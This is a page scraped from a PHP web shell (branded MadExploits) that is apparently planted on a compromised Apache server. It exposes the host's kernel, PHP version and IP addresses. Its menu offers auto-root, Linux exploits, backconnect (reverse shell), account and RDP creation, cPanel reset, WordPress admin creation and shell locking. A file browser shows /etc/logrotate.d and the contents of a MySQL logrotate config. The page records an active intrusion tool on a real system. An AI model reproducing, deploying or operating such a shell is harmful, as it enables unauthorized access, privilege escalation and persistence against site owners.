Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
logrotate.d /
[ HOME SHELL ]
Name
Size
Permission
Action
btmp
130
B
-rw-r--r--
chrony
160
B
-rw-r--r--
dnf
88
B
-rw-r--r--
fail2ban
363
B
-rw-r--r--
firewalld
93
B
-rw-r--r--
httpd
194
B
-rw-r--r--
kvm_stat
162
B
-rw-r--r--
lfd
172
B
-rw-r--r--
mysqld
1.93
KB
-rw-r--r--
named
514
B
-rw-r-----
php-fpm
203
B
-rw-r--r--
php56-php-fpm
237
B
-rw-r--r--
php70-php-fpm
237
B
-rw-r--r--
php71-php-fpm
237
B
-rw-r--r--
php72-php-fpm
237
B
-rw-r--r--
php73-php-fpm
237
B
-rw-r--r--
php74-php-fpm
237
B
-rw-r--r--
php80-php-fpm
237
B
-rw-r--r--
php81-php-fpm
237
B
-rw-r--r--
php82-php-fpm
237
B
-rw-r--r--
php83-php-fpm
237
B
-rw-r--r--
proftpd
175
B
-rw-r--r--
psacct
408
B
-rw-r--r--
sa-update
68
B
-rw-r--r--
samba
155
B
-rw-r--r--
sssd
237
B
-rw-r--r--
syslog
226
B
-rw-r--r--
virtualmin.conf
3.34
KB
-rw-r--r--
wtmp
145
B
-rw-r--r--
zabbix-agent
132
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mysqld
# Copyright (c) 2000, 2022, Oracle and/or its affiliates. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License, version 2.0, # as published by the Free Software Foundation. # # This program is also distributed with certain software (including # but not limited to OpenSSL) that is licensed under separate terms, # as designated in a particular file or component or in included license # documentation. The authors of MySQL hereby grant you an additional # permission to link the program and your derivative works with the # separately licensed software that they have included with MySQL. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License, version 2.0, for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA # The log file name and location can be set in # /etc/my.cnf by setting the "log-error" option # in either [mysqld] or [mysqld_safe] section as # follows: # # [mysqld] # log-error=/var/lib/mysql/mysqld.log # # In case the root user has a password, then you # have to create a /root/.my.cnf configuration file # with the following content: # # [mysqladmin] # password = <secret> # user= root # # where "<secret>" is the password. # # ATTENTION: The /root/.my.cnf file should be readable # _ONLY_ by root ! /var/log/mysql/mysqld.log { # create 600 mysql mysql notifempty daily rotate 5 missingok compress postrotate # just if mysqld is really running if test -x /usr/bin/mysqladmin && \ /usr/bin/mysqladmin ping &>/dev/null then /usr/bin/mysqladmin flush-logs fi endscript }
Close